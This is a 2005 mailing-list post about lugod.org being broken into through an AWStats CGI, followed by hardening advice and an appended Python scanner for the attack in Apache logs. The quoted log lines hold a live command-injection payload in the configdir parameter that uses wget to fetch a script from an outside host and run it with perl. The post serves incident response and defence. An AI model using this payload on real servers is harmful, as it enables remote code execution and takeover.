[vox-tech] lugod.org cracked?
Rick Moen
rick at linuxmafia.com
Tue Feb 15 15:27:00 PST 2005
Quoting Rod Roark (rod at sunsetsystems.com):
> I think I found the point of entry. From the lugod.org
> apache log:
>
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Host linuxmafia.com was likewise cracked on January 31, 2005, exactly
the same way, by some kiddie connecting from Brazil. (I had everything
rebuilt with no lossage in 22 hours, but it was annoying.)
Personally, if I ever reinstall AWstats, it'll be to run it in batch
fashion to generate static pages, _not_ as a CGI -- and it's generally
wise to be suspicious of programmers' ability and inclination to
validate their input-data streams on public-facing apps. (Remember, any
CGI on a public Web server that accepts input via GET or PUT, including
URL strings submitted via Web browser, is inherently obliged to parse
input data from the public Internet.)
Other changes I made on my site:
1. I discovered to my horror that, despite staying current on PHP4
upgrades, the horrifically unwise "register_globals = On" setting from
some ancient, long-vanished PHP4 package had been retained, and I'd
never been warned about that (or noticed it on my own). That got turned
off (in /etc/php4/apache/php.ini), in a hurry.
2. While I was at it, I gave similar treatment to the allow_url_fopen
and file_uploads booleans in the same file.
3. Also, since trusting users to use decent SSH passwords makes me
nervous, I disabled password authentication. Not that people's RSA/DSA
private keys and passphrases can't be stolen, but it's a little harder,
at least.
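A defender's log check for the request pattern quoted above, as an added example that is not from the thread or from AWStats itself: it parses Apache combined-log lines and flags awstats.pl requests whose configdir value carries shell metacharacters such as the bracketing pipes. The log lines and addresses are constructed samples.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined-log format; the first mimics the
# configdir injection shape, the other two are ordinary requests.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;id;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0"
192.0.2.10 - - [14/Feb/2005:19:40:02 -0800] "GET /awstats/awstats.pl?config=example.org&output=main HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.11 - - [14/Feb/2005:19:41:15 -0800] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that a legitimate configdir (a directory path) never needs.
SHELL_META = re.compile(r'[|;&`$<>]')


def query_params(query):
    """Split a query string on '&' only and percent-decode each side.

    Done by hand rather than with parse_qsl so that ';' inside an injected
    value is never mistaken for a parameter separator.
    """
    pairs = []
    for chunk in query.split('&'):
        key, _, value = chunk.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs


def find_configdir_injection(log_text):
    """Return one dict per awstats.pl request whose configdir looks like a shell command."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('awstats.pl'):
            continue
        for key, value in query_params(parts.query):
            if key == 'configdir' and SHELL_META.search(value):
                # A 200 here means the CGI accepted the request, so treat it as a
                # likely execution, not just an attempt.
                hits.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'status': m.group('status'), 'configdir': value})
    return hits


if __name__ == '__main__':
    for hit in find_configdir_injection(SAMPLE_LOG):
        print(hit)
```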